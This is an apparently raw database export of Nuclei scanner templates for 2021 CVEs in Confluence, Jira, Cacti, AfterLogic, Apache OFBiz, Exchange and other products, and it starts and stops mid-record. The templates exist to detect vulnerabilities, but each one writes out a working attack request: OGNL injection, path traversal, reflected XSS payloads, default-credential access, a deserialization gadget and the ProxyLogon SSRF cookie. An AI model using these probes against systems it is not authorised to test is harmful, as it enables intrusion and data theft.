cve2021,cve,rce,confluence,injection,ognl,kev,atlassian\n\nhttp:\n - raw:\n - |\n POST /{{path}} HTTP/1.1\n Host: 
{{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n queryString=aaaa\\u0027%2b#{16*8787}%2b\\u0027bbb\n\n payloads:\n path:\n - pages/createpage-entervariables.action?SpaceKey=x\n - pages/createpage-entervariables.action\n - confluence/pages/createpage-entervariables.action?SpaceKey=x\n - confluence/pages/createpage-entervariables.action\n - wiki/pages/createpage-entervariables.action?SpaceKey=x\n - wiki/pages/createpage-entervariables.action\n - pages/doenterpagevariables.action\n - pages/createpage.action?spaceKey=myproj\n - pages/templates2/viewpagetemplate.action\n - pages/createpage-entervariables.action\n - template/custom/content-editor\n - templates/editor-preload-container\n - users/user-dark-features\n\n stop-at-first-match: true\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'value=\"aaaa{140592=null}'\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402205f134a1bb31a5f1819448929d1f5a1fb7607689bb3287e0c57970f3ed9b28dff0220487bb1df45ffa1fcc0ccf07cee500d7a022f69f26bd37a565410b759560a2ea0:922c64590222798bb761d5b6d8e72950", "hash": "ebb7d32091893d779194a07099d2a14d", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308304" }, "name": "CVE-2021-26085.yaml", "content": "id: CVE-2021-26085\n\ninfo:\n name: Atlassian Confluence Server - Local File Inclusion\n author: princechaddha\n severity: medium\n description: Atlassian Confluence Server allows remote attackers to view restricted resources via local file inclusion in the /s/ endpoint.\n impact: |\n An attacker can access sensitive information stored on the server, potentially leading to unauthorized access or data leakage.\n remediation: |\n Apply the latest security patches provided by Atlassian to fix the vulnerability.\n reference:\n - https://packetstormsecurity.com/files/164401/Atlassian-Confluence-Server-7.5.1-Arbitrary-File-Read.html\n - https://jira.atlassian.com/browse/CONFSERVER-67893\n - 
https://nvd.nist.gov/vuln/detail/CVE-2021-26085\n - http://packetstormsecurity.com/files/164401/Atlassian-Confluence-Server-7.5.1-Arbitrary-File-Read.html\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n cvss-score: 5.3\n cve-id: CVE-2021-26085\n cwe-id: CWE-425\n epss-score: 0.96595\n epss-percentile: 0.99535\n cpe: cpe:2.3:a:atlassian:confluence_data_center:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: atlassian\n product: confluence_data_center\n shodan-query: http.component:\"Atlassian Confluence\"\n tags: cve2021,cve,kev,packetstorm,confluence,atlassian,lfi,intrusive\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/s/{{randstr}}/_/;/WEB-INF/web.xml\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - Confluence\n - com.atlassian.confluence.setup.ConfluenceAppConfig\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 490a004630440220670cb57e3fae58b67b36bab6ba5d2bc561838e5acd2e94af09eb440761a29dc002201569feec0d7b5543989deae7767a3f8feb7b44f81658e35a09cfffb100e2119c:922c64590222798bb761d5b6d8e72950", "hash": "bafa18a29d435075dc54104e294aa8c6", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308305" }, "name": "CVE-2021-26086.yaml", "content": "id: CVE-2021-26086\n\ninfo:\n name: Atlassian Jira Limited - Local File Inclusion\n author: cocxanh\n severity: medium\n description: Affected versions of Atlassian Jira Limited Server and Data Center are vulnerable to local file inclusion because they allow remote attackers to read particular files via a path traversal vulnerability in the /WEB-INF/web.xml endpoint.\n impact: |\n This vulnerability can result in unauthorized access to sensitive files and data, as well as potential remote code execution, leading to a complete compromise of the affected system.\n remediation: |\n Apply the latest security patches and updates provided by Atlassian to mitigate this vulnerability.\n reference:\n - 
https://jira.atlassian.com/browse/JRASERVER-72695\n - http://packetstormsecurity.com/files/164405/Atlassian-Jira-Server-Data-Center-8.4.0-File-Read.html\n - https://nvd.nist.gov/vuln/detail/CVE-2021-26086\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/Jeromeyoung/CVE-2021-26086\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n cvss-score: 5.3\n cve-id: CVE-2021-26086\n cwe-id: CWE-22\n epss-score: 0.54993\n epss-percentile: 0.97368\n cpe: cpe:2.3:a:atlassian:jira_data_center:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: atlassian\n product: jira_data_center\n shodan-query: http.component:\"Atlassian Jira\"\n tags: cve2021,cve,lfi,packetstorm,jira,intrusive,atlassian\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/s/{{randstr}}/_/;/WEB-INF/web.xml\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4b0a0048304602210087c8cc23306c003d3014cabcd4c3cb912e3c4d87482a41215320d2f95b58eda30221009c6e8471eaa49ae0b54f6509e968ff4afd28159693426f81124b8e14abc37fa6:922c64590222798bb761d5b6d8e72950", "hash": "a4248fe9b1a884f197b5ce412c5cb2f5", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308306" }, "name": "CVE-2021-26247.yaml", "content": "id: CVE-2021-26247\n\ninfo:\n name: Cacti - Cross-Site Scripting\n author: dhiyaneshDK\n severity: medium\n description: Cacti contains a cross-site scripting vulnerability via \"http:///auth_changepassword.php?ref=\" which can successfully execute the JavaScript payload present in the \"ref\" URL parameter.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Apply the latest security patches or upgrade to a patched version of Cacti to mitigate this 
vulnerability.\n reference:\n - https://www.cacti.net/info/changelog\n - https://nvd.nist.gov/vuln/detail/CVE-2021-26247\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-26247\n cwe-id: CWE-79\n epss-score: 0.00255\n epss-percentile: 0.647\n cpe: cpe:2.3:a:cacti:cacti:0.8.7g:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: cacti\n product: cacti\n tags: cve,cve2021,cacti,xss\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/auth_changepassword.php?ref=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '\">'\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100e338922cb8b551aff81b4174eeb54b3d03de0063dcba852a37d9e56fca5b6aac022100889322591e888230de5003fd765440786e4839255f6b01983ec19666b8e127f5:922c64590222798bb761d5b6d8e72950", "hash": "4c09db2ae2f1d3b1758e3b610e82d37c", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308307" }, "name": "CVE-2021-26292.yaml", "content": "id: CVE-2021-26292\n\ninfo:\n name: AfterLogic Aurora and WebMail Pro < 7.7.9 - Full Path Disclosure\n author: johnk3r\n severity: low\n description: |\n AfterLogic Aurora and WebMail Pro products with 7.7.9 and all lower versions are affected by this vulnerability, simply sending an HTTP DELETE request to WebDAV EndPoint with built-in “caldav_public_user@localhost” and it’s the predefined password “caldav_public_user” allows the attacker to obtain web root path.\n reference:\n - https://github.com/E3SEC/AfterLogic/blob/main/CVE-2021-26292-full-path-disclosure-vulnerability.md\n - https://nvd.nist.gov/vuln/detail/CVE-2021-26292\n classification:\n cve-id: CVE-2021-26292\n metadata:\n verified: true\n max-request: 1\n vendor: 
AfterLogic\n product: AfterLogic Aurora & WebMail\n fofa-query: \"X-Server: AfterlogicDAVServer\"\n tags: cve2021,cve,afterlogic,path,disclosure,AfterLogic\n\nhttp:\n - raw:\n - |\n DELETE /dav/server.php/files/personal/GIVE_ME_ERROR_TO_GET_DOC_ROOT_2021 HTTP/1.1\n Host: {{Hostname}}\n Authorization: Basic Y2FsZGF2X3B1YmxpY191c2VyQGxvY2FsaG9zdDpjYWxkYXZfcHVibGljX3VzZXI\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"caldav_public_user\"\n - \"GIVE_ME_ERROR_TO_GET_DOC_ROOT_2021\"\n condition: and\n\n - type: word\n part: header\n words:\n - \"application/xml\"\n\n - type: status\n status:\n - 404\n# digest: 4a0a00473045022100ad5306a2d12bd71a320ef1a609dc0fcc26696853a67e766b855fec5502950393022032de7c3a4f65e5633891b3f3495fd75c4e567f7b884cd001f47b0bb141e57037:922c64590222798bb761d5b6d8e72950", "hash": "dbb01a8b5f6b4459e4b0cc616990936e", "level": 3, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308308" }, "name": "CVE-2021-26294.yaml", "content": "id: CVE-2021-26294\n\ninfo:\n name: AfterLogic Aurora and WebMail Pro < 7.7.9 - Information Disclosure\n author: johnk3r\n severity: high\n description: |\n AfterLogic Aurora and WebMail Pro products with 7.7.9 and all lower versions are affected by this vulnerability, simply sending an HTTP GET request to WebDAV EndPoint with built-in “caldav_public_user@localhost” and it’s the predefined password “caldav_public_user” allows the attacker to read all files under the web root.\n reference:\n - https://github.com/E3SEC/AfterLogic/blob/main/CVE-2021-26294-exposure-of-sensitive-information-vulnerability.md\n - https://nvd.nist.gov/vuln/detail/CVE-2021-26294\n - https://github.com/Threekiii/Awesome-POC\n - https://github.com/soosmile/POC\n - https://github.com/tzwlhack/Vulnerability\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2021-26294\n cwe-id: CWE-22\n epss-score: 0.25543\n epss-percentile: 0.96591\n cpe: 
cpe:2.3:a:afterlogic:aurora:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: afterlogic\n product: aurora\n fofa-query: \"X-Server: AfterlogicDAVServer\"\n tags: cve2021,cve,afterlogic,exposure,AfterLogic\n\nhttp:\n - raw:\n - |\n GET /dav/server.php/files/personal/%2e%2e/%2e%2e//%2e%2e//%2e%2e/data/settings/settings.xml HTTP/1.1\n Host: {{Hostname}}\n Authorization: Basic Y2FsZGF2X3B1YmxpY191c2VyQGxvY2FsaG9zdDpjYWxkYXZfcHVibGljX3VzZXI\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n - \"\"\n - \"\"\n condition: and\n\n - type: word\n part: header\n words:\n - \"application/octet-stream\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100946db71c9c0e5b872bed57665de3060aba3d7e263f8bb7d763c03046709ab78a022100a5715e19435bd033d5da6cc980eceb717e143e184e8342d77f893624fec063a0:922c64590222798bb761d5b6d8e72950", "hash": "c5e27f145d15db7a3f1860709223d6ec", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308309" }, "name": "CVE-2021-26295.yaml", "content": "id: CVE-2021-26295\n\ninfo:\n name: Apache OFBiz <17.12.06 - Arbitrary Code Execution\n author: madrobot\n severity: critical\n description: |\n Apache OFBiz has unsafe deserialization prior to 17.12.06. 
An unauthenticated attacker can use this vulnerability to successfully take over Apache OFBiz.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.\n remediation: |\n Upgrade Apache OFBiz to version 17.12.06 or later to mitigate this vulnerability.\n reference:\n - https://github.com/yumusb/CVE-2021-26295-POC\n - https://packetstormsecurity.com/files/162104/Apache-OFBiz-SOAP-Java-Deserialization.html\n - https://github.com/zhzyker/exphub/tree/master/ofbiz\n - https://lists.apache.org/thread.html/r3c1802eaf34aa78a61b4e8e044c214bc94accbd28a11f3a276586a31%40%3Cuser.ofbiz.apache.org%3E\n - https://lists.apache.org/thread.html/r6e4579c4ebf7efeb462962e359501c6ca4045687f12212551df2d607@%3Cnotifications.ofbiz.apache.org%3E\n - https://nvd.nist.gov/vuln/detail/CVE-2021-26295\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-26295\n cwe-id: CWE-502\n epss-score: 0.97465\n epss-percentile: 0.99956\n cpe: cpe:2.3:a:apache:ofbiz:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: apache\n product: ofbiz\n shodan-query: \"OFBiz.Visitor=\"\n ysoserial-payload: java -jar ysoserial.jar URLDNS https://oob-url-to-request.tld | hex\n tags: cve2021,cve,packetstorm,apache,ofbiz,deserialization,rce\n\nhttp:\n - raw:\n - |\n POST /webtools/control/SOAPService HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/xml\n\n \n \n \n \n \n {{generate_java_gadget(\"dns\", \"https://{{interactsh-url}}\", \"hex\")}}\n \n \n \n\n matchers-condition: and\n matchers:\n - type: word\n part: interactsh_protocol\n words:\n - \"dns\"\n\n - type: word\n part: body\n words:\n - \"errorMessage\"\n condition: and\n\n - type: word\n part: header\n words:\n - \"OFBiz.Visitor=\"\n# digest: 
4b0a00483046022100e04458e25cbecebcd58811ac23c6174bce44be12837d57ec0e89d7cbf3f996ac02210094dd842930966ba832f8c767196969e556ed6c5dae58db9b461e66f7eefa4786:922c64590222798bb761d5b6d8e72950", "hash": "43da5a2b3c7b44160df3451fef5f198f", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30830a" }, "name": "CVE-2021-26475.yaml", "content": "id: CVE-2021-26475\n\ninfo:\n name: EPrints 3.4.2 - Cross-Site Scripting\n author: geeknik\n severity: medium\n description: EPrints 3.4.2 contains a reflected cross-site scripting vulnerability via the cgi/cal URI.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Apply the latest security patches or upgrade to a newer version of EPrints that addresses this vulnerability.\n reference:\n - https://github.com/grymer/CVE/blob/master/eprints_security_review.pdf\n - https://files.eprints.org/2548/\n - https://nvd.nist.gov/vuln/detail/CVE-2021-26475\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-26475\n cwe-id: CWE-79\n epss-score: 0.00187\n epss-percentile: 0.55045\n cpe: cpe:2.3:a:eprints:eprints:3.4.2:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: eprints\n product: eprints\n tags: cve2021,cve,xss,eprints,intrusive\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/cgi/cal?year=2021%3C/title%3E%3Cscript%3Ealert(%27{{randstr}}%27)%3C/script%3E\"\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - \n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 
4a0a0047304502202452d5fb2331fc4cd220e2b60231d049e3b532911c4d99f8e529d0144c7b0609022100ca6708d82d87e98408b4170a72a55b202ee7bdeff2a6dc258707cdd881354d6b:922c64590222798bb761d5b6d8e72950", "hash": "d39a905622fec211f257989a8325aa5e", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30830b" }, "name": "CVE-2021-26598.yaml", "content": "id: CVE-2021-26598\n\ninfo:\n name: ImpressCMS <1.4.3 - Incorrect Authorization\n author: gy741,pdteam\n severity: medium\n description: ImpressCMS before 1.4.3 is susceptible to incorrect authorization via include/findusers.php. An attacker can provide a security token and potentially obtain sensitive information, modify data, and/or execute unauthorized operations.\n impact: |\n An attacker can bypass authorization and gain unauthorized access to sensitive information or perform unauthorized actions.\n remediation: |\n Upgrade to ImpressCMS version 1.4.3 or later to fix the vulnerability.\n reference:\n - https://hackerone.com/reports/1081137\n - http://karmainsecurity.com/KIS-2022-03\n - https://github.com/ImpressCMS\n - https://nvd.nist.gov/vuln/detail/CVE-2021-26598\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n cvss-score: 5.3\n cve-id: CVE-2021-26598\n cwe-id: CWE-287\n epss-score: 0.00506\n epss-percentile: 0.74005\n cpe: cpe:2.3:a:impresscms:impresscms:*:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: impresscms\n product: impresscms\n shodan-query: http.html:\"ImpressCMS\"\n tags: cve,cve2021,hackerone,impresscms,unauth,cms\n\nhttp:\n - raw:\n - |\n GET /misc.php?action=showpopups&type=friend HTTP/1.1\n Host: {{Hostname}}\n User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36\n - |\n GET /include/findusers.php?token={{token}} HTTP/1.1\n Host: {{Hostname}}\n User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) 
Chrome/35.0.3319.102 Safari/537.36\n\n matchers-condition: and\n matchers:\n - type: word\n part: body_2\n words:\n - 'last_login'\n - 'user_regdate'\n - 'uname'\n condition: and\n\n - type: status\n status:\n - 200\n\n extractors:\n - type: regex\n name: token\n group: 1\n regex:\n - \"REQUEST' value='(.*?)'\"\n - 'REQUEST\" value=\"(.*?)\"'\n internal: true\n# digest: 490a004630440220212c67e7bb70c702c7016c3707bc652545339b2bf7432cd9856554bf94c4aca7022059f173bc4a50d952ad2daecb41b5db846709ffa51383e8c68eec3f1232702572:922c64590222798bb761d5b6d8e72950", "hash": "f6cfa985bc25a53523750b38d3afb9b0", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30830c" }, "name": "CVE-2021-26702.yaml", "content": "id: CVE-2021-26702\n\ninfo:\n name: EPrints 3.4.2 - Cross-Site Scripting\n author: ritikchaddha\n severity: medium\n description: EPrints 3.4.2 contains a reflected cross-site scripting vulnerability in the dataset parameter to the cgi/dataset_ dictionary URI.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Apply the latest security patches or upgrade to a newer version of EPrints that addresses this vulnerability.\n reference:\n - https://github.com/grymer/CVE/blob/master/eprints_security_review.pdf\n - https://files.eprints.org/2548/\n - https://nvd.nist.gov/vuln/detail/CVE-2021-26702\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/grymer/CVE\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-26702\n cwe-id: CWE-79\n epss-score: 0.00187\n epss-percentile: 0.55045\n cpe: cpe:2.3:a:eprints:eprints:3.4.2:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: eprints\n product: eprints\n tags: cve2021,cve,xss,eprints\n\nhttp:\n - method: GET\n 
path:\n - \"{{BaseURL}}/cgi/dataset_dictionary?dataset=zulu%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\"\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a004830460221009b48ac40178577233170a5f266ee2c7b513aa37f7b23a52a482a075b66751079022100cb0c07b43883f3e7f17d94e7c61f0729594cc79ccec51c2470e9060313d1e9ec:922c64590222798bb761d5b6d8e72950", "hash": "8793ecbeed3cdf7ef71e4bde9c52d810", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30830d" }, "name": "CVE-2021-26710.yaml", "content": "id: CVE-2021-26710\n\ninfo:\n name: Redwood Report2Web 4.3.4.5 & 4.5.3 - Cross-Site Scripting\n author: pikpikcu\n severity: medium\n description: Redwood Report2Web 4.3.4.5 and 4.5.3 contains a cross-site scripting vulnerability in the login panel which allows remote attackers to inject JavaScript via the signIn.do urll parameter.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website.\n remediation: |\n Upgrade to the latest version of Redwood Report2Web or apply the vendor-provided patch to fix the XSS vulnerability.\n reference:\n - https://vict0ni.me/report2web-xss-frame-injection.html\n - https://vict0ni.me/redwood-report2web-xss-and-frame-injection/\n - https://nvd.nist.gov/vuln/detail/CVE-2021-26710\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-26710\n cwe-id: CWE-79\n epss-score: 0.00114\n epss-percentile: 0.44746\n cpe: cpe:2.3:a:redwood:report2web:4.3.4.5:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: redwood\n product: report2web\n 
tags: cve2021,cve,redwood,xss\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/r2w/signIn.do?urll=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \">\"\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402205c436359876340eb592c03cc12f835097f4b6bc047e5fc3af143ac3088f37b340220357ce113e9758c32d25793658fc5636644aa16bca78df98ec9e0f2eb6b2f7ba7:922c64590222798bb761d5b6d8e72950", "hash": "a7e4557e033b86d6571216cad7369044", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30830e" }, "name": "CVE-2021-26723.yaml", "content": "id: CVE-2021-26723\n\ninfo:\n name: Jenzabar 9.2x-9.2.2 - Cross-Site Scripting\n author: pikpikcu\n severity: medium\n description: Jenzabar 9.2.x through 9.2.2 contains a cross-site scripting vulnerability. It allows /ics?tool=search&query.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Apply the latest security patch or upgrade to a non-vulnerable version of Jenzabar 9.2x-9.2.2.\n reference:\n - http://packetstormsecurity.com/files/161303/Jenzabar-9.2.2-Cross-Site-Scripting.html\n - https://gist.github.com/Y0ung-DST/d1b6b65be6248b0ffc2b2f2120deb205\n - https://jenzabar.com/blog\n - https://y0ungdst.medium.com/xss-in-jenzabar-cve-2021-26723-a0749231328\n - https://nvd.nist.gov/vuln/detail/CVE-2021-26723\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-26723\n cwe-id: CWE-79\n epss-score: 0.07461\n epss-percentile: 0.93477\n cpe: cpe:2.3:a:jenzabar:jenzabar:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: jenzabar\n product: jenzabar\n tags: 
cve2021,cve,packetstorm,jenzabar,xss\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/ics?tool=search&query=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \">\"\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 490a00463044022015c16d5c72f64fa026e48a1f863962d923527709b62ec881a563bccc792ff84a022010b46416ae8abc326958a0fd90e2df9159f95afb4615b86068dc15bd734ea504:922c64590222798bb761d5b6d8e72950", "hash": "a3e2964433b9dfe01129e41dae14b270", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30830f" }, "name": "CVE-2021-26812.yaml", "content": "id: CVE-2021-26812\n\ninfo:\n name: Moodle Jitsi Meet 2.7-2.8.3 - Cross-Site Scripting\n author: aceseven (digisec360)\n severity: medium\n description: Moodle Jitsi Meet 2.7 through 2.8.3 plugin contains a cross-site scripting vulnerability via the \"sessionpriv.php\" module. 
This allows attackers to craft a malicious URL, which when clicked on by users, can inject JavaScript code to be run by the application.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Update to the latest version of the Moodle Jitsi Meet plugin to mitigate the XSS vulnerability.\n reference:\n - https://github.com/udima-university/moodle-mod_jitsi/issues/67\n - https://nvd.nist.gov/vuln/detail/CVE-2021-26812\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-26812\n cwe-id: CWE-79\n epss-score: 0.00464\n epss-percentile: 0.72797\n cpe: cpe:2.3:a:jitsi:meet:*:*:*:*:*:moodle:*:*\n metadata:\n max-request: 1\n vendor: jitsi\n product: meet\n framework: moodle\n tags: cve2021,cve,moodle,jitsi,xss,plugin\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/mod/jitsi/sessionpriv.php?avatar=https%3A%2F%2F{{Hostname}}%2Fuser%2Fpix.php%2F498%2Ff1.jpg&nom=test_user%27)%3balert(document.domain)%3b//&ses=test_user&t=1\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"alert(document.domain);\"\n\n - type: word\n part: header\n words:\n - \"MoodleSession\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100ebda609c7ab89f085291e361b7d1484576e1270e57d3c66c3086a510088bf420022100dd880ddaa420f7476ba79dc50f12cbc0f7d5c2a225b28a3654c575a703e4838e:922c64590222798bb761d5b6d8e72950", "hash": "0dd653c7572737a9aee5a666566ac365", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308310" }, "name": "CVE-2021-26855.yaml", "content": "id: CVE-2021-26855\n\ninfo:\n name: Microsoft Exchange Server SSRF Vulnerability\n author: madrobot\n severity: critical\n description: This vulnerability is part of an attack chain that could allow remote code 
execution on Microsoft Exchange Server. The initial attack requires the ability to make an untrusted connection to Exchange server port 443. Other portions of the chain can be triggered if an attacker already has access or can convince an administrator to open a malicious file. Be aware his CVE ID is unique from CVE-2021-26412, CVE-2021-26854, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065, and CVE-2021-27078.\n impact: |\n Successful exploitation of this vulnerability could lead to unauthorized access to sensitive information, remote code execution, or further compromise of the affected system.\n remediation: Apply the appropriate security update.\n reference:\n - https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26855\n - https://proxylogon.com/#timeline\n - https://web.archive.org/web/20210306113850/https://raw.githubusercontent.com/microsoft/CSS-Exchange/main/Security/http-vuln-cve2021-26855.nse\n - https://gist.github.com/testanull/324546bffab2fe4916d0f9d1f03ffa09\n - https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26855\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N\n cvss-score: 9.1\n cve-id: CVE-2021-26855\n cwe-id: CWE-918\n epss-score: 0.97507\n epss-percentile: 0.9998\n cpe: cpe:2.3:a:microsoft:exchange_server:2013:cumulative_update_21:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: microsoft\n product: exchange_server\n shodan-query: vuln:CVE-2021-26855\n tags: cve2021,cve,ssrf,rce,exchange,oast,microsoft,kev\n\nhttp:\n - raw:\n - |\n GET /owa/auth/x.js HTTP/1.1\n Host: {{Hostname}}\n Cookie: X-AnonResource=true; X-AnonResource-Backend={{interactsh-url}}/ecp/default.flt?~3;\n\n matchers:\n - type: word\n part: interactsh_protocol # Confirms the HTTP Interaction\n words:\n - \"http\"\n# digest: 
490a0046304402200fe691411eb53b66b4b48310012159cc2bfc49aa63c0600a307d387ce1aec440022061edab41f21f98729505a5cc7d7b10ac98eca71c97400b948a630967c9e0a0b0:922c64590222798bb761d5b6d8e72950", "hash": "539912fe18d65db60f9e8b3451d14341", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308311" }, "name": "CVE-2021-27124.yaml", "content": "id: CVE-2021-27124\n\ninfo:\n name: Doctor Appointment System 1.0 - SQL Injection\n author: theamanrawat\n severity: medium\n description: |\n SQL injection in the expertise parameter in search_result.php in Doctor Appointment System v1.0.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.\n remediation: |\n Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.sourcecodester.com/php/14182/doctor-appointment-system.html\n - https://packetstormsecurity.com/files/161342/Doctor-Appointment-System-1.0-SQL-Injection.html\n - https://nvd.nist.gov/vuln/detail/CVE-2021-27124\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 6.5\n cve-id: CVE-2021-27124\n cwe-id: CWE-89\n epss-score: 0.01251\n epss-percentile: 0.85241\n cpe: cpe:2.3:a:doctor_appointment_system_project:doctor_appointment_system:1.0:*:*:*:*:*:*:*\n metadata:\n verified: \"true\"\n max-request: 1\n 